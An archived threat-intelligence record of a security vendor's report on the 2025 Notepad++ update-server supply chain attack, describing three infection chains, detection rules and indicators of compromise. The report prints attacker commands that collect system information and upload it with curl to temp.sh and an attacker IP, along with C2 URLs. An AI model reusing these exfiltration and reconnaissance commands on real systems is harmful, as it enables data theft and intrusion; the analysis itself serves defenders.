{
	"id": "3229d7cb-0f2e-407d-b2f5-8e122aa7dd92",
	"created_at": "2026-04-06T00:21:50.813666Z",
	"updated_at": "2026-04-10T03:19:59.796234Z",
	"deleted_at": null,
	"sha1_hash": "b4e81b0030179d385af7e38ed98cb26c162b67b4",
	"title": "The Notepad++ supply chain attack — unnoticed execution chains and new IoCs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 773915,
	"plain_text": "The Notepad++ supply chain attack — unnoticed execution chains\r\nand new IoCs\r\nBy Georgy Kucherin\r\nPublished: 2026-02-03 · Archived: 2026-04-05 15:17:50 UTC\r\nUPD 11.02.2026: added recommendations on how to use the Notepad++ supply chain attack rules package in our\r\nSIEM system.\r\nIntroduction\r\nOn February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement\r\nclaiming that the update infrastructure of Notepad++ had been compromised. According to the statement, this was\r\ndue to a hosting provider-level incident, which occurred from June to September 2025. However, attackers had\r\nbeen able to retain access to internal services until December 2025.\r\nMultiple execution chains and payloads\r\nHaving checked our telemetry related to this incident, we were amazed to find out how different and unique the\r\nexecution chains used in this supply chain attack were. We identified that over the course of four months, from\r\nJuly to October 2025, attackers who had compromised Notepad++ had been constantly rotating C2 server\r\naddresses used for distributing malicious updates, the downloaders used for implant delivery, as well as the final\r\npayloads.\r\nWe observed three different infection chains overall, designed to attack about a dozen machines, belonging to:\r\nIndividuals located in Vietnam, El Salvador, and Australia;\r\nA government organization located in the Philippines;\r\nA financial organization located in El Salvador;\r\nAn IT service provider organization located in Vietnam.\r\nDespite the variety of payloads observed, Kaspersky solutions were able to block the identified attacks as they\r\noccurred.\r\nIn this article, we describe the variety of the infection chains we observed in the Notepad++ supply chain attack,\r\nas well as provide numerous previously unpublished IoCs related to it.\r\nChain #1: late July and early August 2025\r\nWe observed attackers to deploy a malicious Notepad++ update for the first time in late July 2025. It was hosted at\r\nhttp://45.76.155[.]202/update/update.exe. Notably, the first scan of this URL on the VirusTotal platform occurred\r\nin late September, by a user from Taiwan.\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 1 of 11\n\nThe update.exe file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was\r\nlaunched by the legitimate Notepad++ updater process, GUP.exe . This file turned out to be a NSIS installer about\r\n1 MB in size. When started, it sends a heartbeat containing system information to the attackers. This is done\r\nthrough the following steps:\r\n1. 1 The file creates a directory named %appdata%\\ProShow and sets it as the current directory;\r\n2. 2 It executes the shell command cmd /c whoami\u0026\u0026tasklist \u003e 1.txt , thus creating a file with the shell\r\ncommand execution results in the %appdata%\\ProShow directory;\r\n3. 3 Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F\r\n\"file=@1.txt\" -s https://temp.sh/upload command;\r\n4. 4 Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent\r\n\"https://temp.sh/ZMRKV/1.txt\" -s http://45.76.155[.]202 shell command. As can be observed, the\r\nuploaded file URL is transferred inside the user agent.\r\nNotably, the same behavior of malicious Notepad++ updates, specifically the launch of shell commands and the\r\nuse of the temp[.]sh website for file uploading, was described on the Notepad++ community forums by a user\r\nnamed soft-parsley.\r\nAfter sending system information, the update.exe file executes the second-stage payload. To do that, it performs\r\nthe following actions:\r\nDrops the following files to the %appdata%\\ProShow directory:\r\nProShow.exe (SHA1: defb05d5a91e4920c9e22de2d81c5dc9b95a9a7c)\r\ndefscr (SHA1: 259cd3542dea998c57f67ffdd4543ab836e3d2a3)\r\nif.dnt (SHA1: 46654a7ad6bc809b623c51938954de48e27a5618)\r\nproshow.crs\r\nproshow.phd\r\nproshow_e.bmp (SHA1: 9df6ecc47b192260826c247bf8d40384aa6e6fd6)\r\nload (SHA1: 06a6a5a39193075734a32e0235bde0e979c27228)\r\nExecutes the dropped ProShow.exe file.\r\nThe ProShow.exe file being launched is legitimate ProShow software, which is abused to launch a malicious\r\npayload. Normally, when threat actors aim to execute a malicious payload inside a legitimate process, they resort\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 2 of 11\n\nto the DLL sideloading technique. However, this time attackers decided to avoid using it — likely due to how\r\nmuch attention this technique receives nowadays. Instead, they abused an old, known vulnerability in the\r\nProShow software, which dates back to early 2010s. The dropped file named load contains an exploit payload,\r\nwhich is launched when the ProShow.exe file is launched. It is worth noting that, apart from this payload, all\r\nfiles in the %appdata%\\ProShow directory are legitimate.\r\nAnalysis of the exploit payload revealed that it contained two shellcodes: one at the very start and the other one in\r\nthe middle of the file. The shellcode located at the start of the file contained a set of meaningless instructions and\r\nwas not designed to be executed — rather, attackers used it as the exploit padding bytes. It is likely that, by using\r\na fake shellcode for padding bytes instead of something else (e.g., a sequence of 0x41 characters or random\r\nbytes), attackers aimed to confuse researchers and automated analysis systems.\r\nThe second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is\r\nstarted. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL\r\nhttps://45.77.31[.]210/users/admin (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.\r\nThe Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance,\r\nit uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL\r\nhttps://45.77.31[.]210/api/FileUpload/submit.\r\nLater on, in early August 2025, we observed attackers to use the same download URL for the update.exe files\r\n(observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for\r\ndelivery of Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:\r\nIn the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to\r\nhttps://cdncheck.it[.]com/users/admin;\r\nThe Cobalt Strike C2 server URLs were set to https://cdncheck.it[.]com/api/update/v1 and\r\nhttps://cdncheck.it[.]com/api/Metadata/submit.\r\nWe have not further seen any infections leveraging chain #1 since early August 2025.\r\nChain #2: mid- and late September 2025\r\nA month and a half after malicious update detections ceased, we observed attackers to resume deploying these\r\nupdates in the middle of September 2025, using another infection chain. The malicious update was still being\r\ndistributed from the URL http://45.76.155[.]202/update/update.exe, and the file downloaded from it (SHA1 hash:\r\n573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now\r\nabout 140 KB. Again, this file performed two actions:\r\nObtained system information by executing a shell command and uploading its execution results to\r\ntemp[.]sh;\r\nDropped a next-stage payload on disk and launched it.\r\nRegarding system information, attackers made the following changes to how it was collected:\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 3 of 11\n\nThey changed the working directory to %APPDATA%\\Adobe\\Scripts;\r\nThey started collecting more system information details, changing the shell command being executed to\r\ncmd /c \"whoami\u0026\u0026tasklist\u0026\u0026systeminfo\u0026\u0026netstat -ano\" \u003e a.txt .\r\nThe created a.txt file was, just as in the case of stage #1, uploaded to the temp[.]sh website through curl, with\r\nthe obtained temp[.]sh URL being transferred to the same http://45.76.155[.]202/list endpoint, inside the User-Agent header.\r\nAs for the next-stage payload, it was changed completely. The NSIS installer was configured to drop the following\r\nfiles into the %APPDATA%\\Adobe\\Scripts directory:\r\nalien.dll (SHA1: 6444dab57d93ce987c22da66b3706d5d7fc226da);\r\nlua5.1.dll (SHA1: 2ab0758dda4e71aee6f4c8e4c0265a796518f07d);\r\nscript.exe (SHA1: bf996a709835c0c16cce1015e6d44fc95e08a38a);\r\nalien.ini (SHA1: ca4b6fe0c69472cd3d63b212eb805b7f65710d33).\r\nNext, it executes the following shell command to launch the script.exe file:\r\n%APPDATA%\\%Adobe\\Scripts\\script.exe %APPDATA%\\Adobe\\Scripts\\alien.ini .\r\nAll of the files in the %APPDATA%\\Adobe\\Scripts directory, except for alien.ini , are legitimate and related to\r\nthe Lua interpreter. As such, the previously mentioned command is used by attackers to launch a compiled Lua\r\nscript, located in the alien.ini file. Below is a screenshot of its decompilation:\r\nAs we can see, this small script is used for placing shellcode inside executable memory and then launching it\r\nthrough the EnumWindowStationsW API function.\r\nThe launched shellcode is, just in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike\r\nBeacon payload, again in the form of a shellcode, from the URL https://cdncheck.it[.]com/users/admin.\r\nThe Cobalt Strike payload contains the C2 server URLs that slightly differ from the ones seen previously:\r\nhttps://cdncheck.it[.]com/api/getInfo/v1 and https://cdncheck.it[.]com/api/FileUpload/submit.\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 4 of 11\n\nAttacks involving chain #2 continued until the end of September, when we observed two more malicious\r\nupdate.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt\r\nStrike Beacon payload delivered through it was configured to use the same URLs observed in mid-September,\r\nhowever, attackers changed the way system information was collected. Specifically, attackers split the single shell\r\ncommand they used for this ( cmd /c \"whoami\u0026\u0026tasklist\u0026\u0026systeminfo\u0026\u0026netstat -ano\" \u003e a.txt ) into multiple\r\ncommands:\r\ncmd /c whoami \u003e\u003e a.txt\r\ncmd /c tasklist \u003e\u003e a.txt\r\ncmd /c systeminfo \u003e\u003e a.txt\r\ncmd /c netstat -ano \u003e\u003e a.txt\r\nNotably, the same sequence of commands was previously documented by the user soft-parsley on the Notepad++\r\ncommunity forums.\r\nThe other update.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. By using it,\r\nattackers performed the following:\r\nChanged the system information upload URL to https://self-dns.it[.]com/list;\r\nChanged the user agent used in HTTP requests to Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;\r\nChanged the URL used by the Metasploit downloader to https://safe-dns.it[.]com/help/Get-Start;\r\nChanged the Cobalt Strike Beacon C2 server URLs to https://safe-dns.it[.]com/resolve and https://safe-dns.it[.]com/dns-query.\r\nChain #3: October 2025\r\nIn early October 2025, the attackers changed the infection chain once again. They also changed the C2 server for\r\ndistributing malicious updates, with the observed update URL being http://45.32.144[.]255/update/update.exe. The\r\npayload downloaded (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still a NSIS installer, however,\r\nunlike in the case of chains 1 and 2, this installer did not include the system information sending functionality. It\r\nsimply dropped the following files to the %appdata%\\Bluetooth\\ directory:\r\nBluetoothService.exe , a legitimate executable (SHA1: 21a942273c14e4b9d3faa58e4de1fd4d5014a1ed);\r\nlog.dll , a malicious DLL (SHA1: f7910d943a013eede24ac89d6388c1b98f8b3717);\r\nBluetoothService , an encrypted shellcode (SHA1: 7e0790226ea461bcc9ecd4be3c315ace41e1c122).\r\nThis execution chain relies on the sideloading of the log.dll file, which is responsible for launching the\r\nencrypted BluetoothService shellcode into the BluetoothService.exe process. Notably, such execution chains\r\nare commonly used by Chinese-speaking threat actors. This particular execution chain has already been described\r\nby Rapid7, and the final payload observed in it is the custom Chrysalis backdoor.\r\nUnlike the previous chains, chain #3 does not load a Cobalt Strike Beacon directly. However, in their article\r\nRapid7 claim that they additionally observed a Cobalt Strike Beacon payload being deployed to the\r\nC:\\ProgramData\\USOShared folder, while conducting incident response on one of the machines infected by the\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 5 of 11\n\nNotepad++ supply chain attack. Whilst Rapid7 does not detail how this file was dropped to the victim machine,\r\nwe can highlight the following similarities between that Beacon payload and the Beacon payloads observed in\r\nchains #1 and #2:\r\n1. 1 In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used\r\n(api.wiresguard.com/users/admin for the Rapid7 payload, cdncheck.it.com/users/admin and\r\nhttp://45.77.31[.]210/users/admin for chain #1 and chain #2 payloads);\r\n2. 2 The Beacon configurations are encrypted with the XOR key CRAZY ;\r\n3. 3 Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e.\r\napi.wiresguard.com/api/FileUpload/submit for the Rapid7 payload and\r\nhttps://45.77.31[.]210/api/FileUpload/submit for the chain #1 payload).\r\nReturn of chain #2 and changes in URLs: October 2025\r\nIn mid-October 2025, we observed attackers to resume deployments of the chain #2 payload (SHA1 hash:\r\n821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: http://95.179.213[.]0/update/update.exe.\r\nStill, this payload used the previously mentioned self-dns.it[.]com and safe-dns.it[.]com domain names for system\r\ninformation uploading, Metasploit downloader and Cobalt Strike Beacon communications.\r\nFurther in late October 2025, we observed attackers to start changing URLs used for malicious update deliveries.\r\nSpecifically, attackers started using the following URLs:\r\nhttp://95.179.213[.]0/update/install.exe;\r\nhttp://95.179.213[.]0/update/update.exe;\r\nhttp://95.179.213[.]0/update/AutoUpdater.exe.\r\nWe didn’t observe any new payloads deployed from these URLs — they involved usage of both #2 and #3\r\nexecution chains. Finally, we didn’t see any payloads being deployed since November 2025.\r\nConclusion\r\nNotepad++ is a text editor used by numerous developers. As such, the ability to control update servers of this\r\nsoftware gave the attackers a unique possibility to break into machines of high-profile organizations around the\r\nworld. The attackers made an effort to avoid losing access to this infection vector — they were spreading the\r\nmalicious implants in a targeted manner, and they were skilled enough to drastically change the infection chains\r\nabout once a month. Whilst we identified three distinct infection chains during our investigation, we would not be\r\nsurprised to see more of them in use. To sum up our findings, here is the overall timeline of the infection chains\r\nthat we identified:\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 6 of 11\n\nThe variety of infection chains makes detection of the Notepad++ supply chain attack quite a difficult, and at the\r\nsame time creative, task. We would like to propose the following methods, from generic to specific, to hunt down\r\ntraces of this attack:\r\nCheck systems for deployments of NSIS installers, which were used in all three observed execution chains.\r\nFor example, this can be done by looking for logs related to creations of a %localappdata%\\Temp\\ns.tmp\r\ndirectory, made by NSIS installers at runtime. Make sure to investigate the origins of each identified NSIS\r\ninstaller to avoid false positives;\r\nCheck network traffic logs for DNS resolutions of the temp[.]sh domain, which is unusual to observe in\r\ncorporate environments. Also, it is beneficial to conduct a check for raw HTTP traffic requests that have a\r\ntemp[.]sh URL embedded in the user agent — both these steps will make it possible to detect chain #1 and\r\nchain #2 deployments;\r\nCheck systems for launches of malicious shell commands referenced in the article, such as whoami ,\r\ntasklist , systeminfo and netstat -ano ;\r\nUse the specific IoCs listed below to identify known malicious domains and files.\r\nDetection by Kaspersky solutions\r\nKaspersky security solutions, such as Kaspersky Next Endpoint Detection and Response Expert, successfully\r\ndetect malicious activity in the attacks described above.\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 7 of 11\n\nLet’s take a closer look at Kaspersky Next EDR Expert.\r\nOne way to detect the described malicious activity is to monitor requests to LOLC2 (Living-Off-the-Land C2)\r\nservices, which include temp[.]sh. Attackers use such services as intermediate control or delivery points for\r\nmalicious payloads, masking C2 communication as legitimate web traffic. KEDR Expert detects this activity using\r\nthe lolc2_connection_activity_network rule.\r\nIn addition, the described activity can be detected by executing typical local reconnaissance commands that\r\nattackers launch in the early stages of an attack after gaining access to the system. These commands allow the\r\nattacker to quickly obtain information about the environment, access rights, running processes, and network\r\nconnections to plan further actions. KEDR Expert detects such activity using the following rules:\r\nsystem_owner_user_discovery, using_whoami_to_check_that_current_user_is_admin,\r\nsystem_information_discovery_win, system_network_connections_discovery_via_standard_windows_utilities.\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 8 of 11\n\nIn this case, a clear sign of malicious activity is gaining persistence through the autorun mechanism via the\r\nWindows registry, specifically the Run key, which ensures that programs start automatically when the user logs in.\r\nKEDR Expert detects this activity using the temporary_folder_in_registry_autorun rule.\r\nTo protect companies that use our Kaspersky SIEM system, we have prepared a set of correlation rules that help\r\ndetect such malicious activity. These rules are already available for customers to download from the SIEM\r\nrepository; the package name is [OOTB] Notepad++ supply chain attack package – ENG.\r\nThe Notepad++ supply chain attack package contains rules that can be divided into two groups based on their\r\ndetection capabilities:\r\n1. 1 Indicators of compromise:\r\n1. 1.1 malicious URLs used to extract information from the targeted infrastructure;\r\n2. 1.2 malicious file names and hashes that were detected in this campaign.\r\n2. 2 Suspicious activity on the host:\r\n1. 2.1 unusual command lines specific to these attacks;\r\n2. 2.2 suspicious network activity from Notepad++ processes and an abnormal process tree;\r\n3. 2.3 traces of data collection, e.g. single-character file names.\r\nSome rules may need to be adjusted if they trigger on legitimate activity, such as administrators’ or inventory\r\nagents’ actions.\r\nWe also recommend using the rules from the Notepad++ supply chain attack package for retrospective analysis\r\n(threat hunting). Recommended analysis period: from September 2025.\r\nFor the detection rules to work correctly, you need to make sure that events from Windows systems are received in\r\nfull, including events 4688 (with command line logging enabled), 5136 (packet filtering), 4663 (access to objects,\r\nespecially files), etc.\r\nIndicators of compromise\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 9 of 11\n\nURLs used for malicious Notepad++ update deployments\r\nhttp://45.76.155[.]202/update/update.exe\r\nhttp://45.32.144[.]255/update/update.exe\r\nhttp://95.179.213[.]0/update/update.exe\r\nhttp://95.179.213[.]0/update/install.exe\r\nhttp://95.179.213[.]0/update/AutoUpdater.exe\r\nSystem information upload URLs\r\nhttp://45.76.155[.]202/list\r\nhttps://self-dns.it[.]com/list\r\nURLs used by Metasploit downloaders to deploy Cobalt Strike beacons\r\nhttps://45.77.31[.]210/users/admin\r\nhttps://cdncheck.it[.]com/users/admin\r\nhttps://safe-dns.it[.]com/help/Get-Start\r\nURLs used by Cobalt Strike Beacons delivered by malicious Notepad++ updaters\r\nhttps://45.77.31[.]210/api/update/v1\r\nhttps://45.77.31[.]210/api/FileUpload/submit\r\nhttps://cdncheck.it[.]com/api/update/v1\r\nhttps://cdncheck.it[.]com/api/Metadata/submit\r\nhttps://cdncheck.it[.]com/api/getInfo/v1\r\nhttps://cdncheck.it[.]com/api/FileUpload/submit\r\nhttps://safe-dns.it[.]com/resolve\r\nhttps://safe-dns.it[.]com/dns-query\r\nURLs used by the Chrysalis backdoor and the Cobalt Strike Beacon payloads associated with it, as previously\r\nidentified by Rapid7\r\nhttps://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821\r\nhttps://api.wiresguard[.]com/update/v1\r\nhttps://api.wiresguard[.]com/api/FileUpload/submit\r\nURLs related to Cobalt Strike Beacons uploaded to multiscanners, as previously identified by Rapid7\r\nhttp://59.110.7[.]32:8880/uffhxpSy\r\nhttp://59.110.7[.]32:8880/api/getBasicInfo/v1\r\nhttp://59.110.7[.]32:8880/api/Metadata/submit\r\nhttp://124.222.137[.]114:9999/3yZR31VK\r\nhttp://124.222.137[.]114:9999/api/updateStatus/v1\r\nhttp://124.222.137[.]114:9999/api/Info/submit\r\nhttps://api.wiresguard[.]com/users/system\r\nhttps://api.wiresguard[.]com/api/getInfo/v1\r\nMalicious updater.exe hashes\r\n8e6e505438c21f3d281e1cc257abdbf7223b7f5a\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 10 of 11\n\n90e677d7ff5844407b9c073e3b7e896e078e11cd\r\n573549869e84544e3ef253bdba79851dcde4963a\r\n13179c8f19fbf3d8473c49983a199e6cb4f318f0\r\n4c9aac447bf732acc97992290aa7a187b967ee2c\r\n821c0cafb2aab0f063ef7e313f64313fc81d46cd\r\nHashes of malicious auxiliary files\r\n06a6a5a39193075734a32e0235bde0e979c27228 — load\r\n9c3ba38890ed984a25abb6a094b5dbf052f22fa7 — load\r\nca4b6fe0c69472cd3d63b212eb805b7f65710d33 — alien.ini\r\n0d0f315fd8cf408a483f8e2dd1e69422629ed9fd — alien.ini\r\n2a476cfb85fbf012fdbe63a37642c11afa5cf020 — alien.ini\r\nMalicious file hashes, as previously identified by Rapid7\r\nd7ffd7b588880cf61b603346a3557e7cce648c93\r\n94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8\r\n21a942273c14e4b9d3faa58e4de1fd4d5014a1ed\r\n7e0790226ea461bcc9ecd4be3c315ace41e1c122\r\nf7910d943a013eede24ac89d6388c1b98f8b3717\r\n73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf\r\nbd4915b3597942d88f319740a9b803cc51585c4a\r\nc68d09dd50e357fd3de17a70b7724f8949441d77\r\n813ace987a61af909c053607635489ee984534f4\r\n9fbf2195dee991b1e5a727fd51391dcc2d7a4b16\r\n07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51\r\n3090ecf034337857f786084fb14e63354e271c5d\r\nd0662eadbe5ba92acbd3485d8187112543bcfbf5\r\n9c0eff4deeb626730ad6a05c85eb138df48372ce\r\nMalicious file paths\r\n%appdata%\\ProShow\\load\r\n%appdata%\\Adobe\\Scripts\\alien.ini\r\n%appdata%\\Bluetooth\\BluetoothService\r\nSource: https://securelist.com/notepad-supply-chain-attack/118708/\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/notepad-supply-chain-attack/118708/"
	],
	"report_names": [
		"118708"
	],
	"threat_actors": [],
	"ts_created_at": 1775434910,
	"ts_updated_at": 1775791199,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b4e81b0030179d385af7e38ed98cb26c162b67b4.pdf",
		"text": "https://archive.orkl.eu/b4e81b0030179d385af7e38ed98cb26c162b67b4.txt",
		"img": "https://archive.orkl.eu/b4e81b0030179d385af7e38ed98cb26c162b67b4.jpg"
	}
}